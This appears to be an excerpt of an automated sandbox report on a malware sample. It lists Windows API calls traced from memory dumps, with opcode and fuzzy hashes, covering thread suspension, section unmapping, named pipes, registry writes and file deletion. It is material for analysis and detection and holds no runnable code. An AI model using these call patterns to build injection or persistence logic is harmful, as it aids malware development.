  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
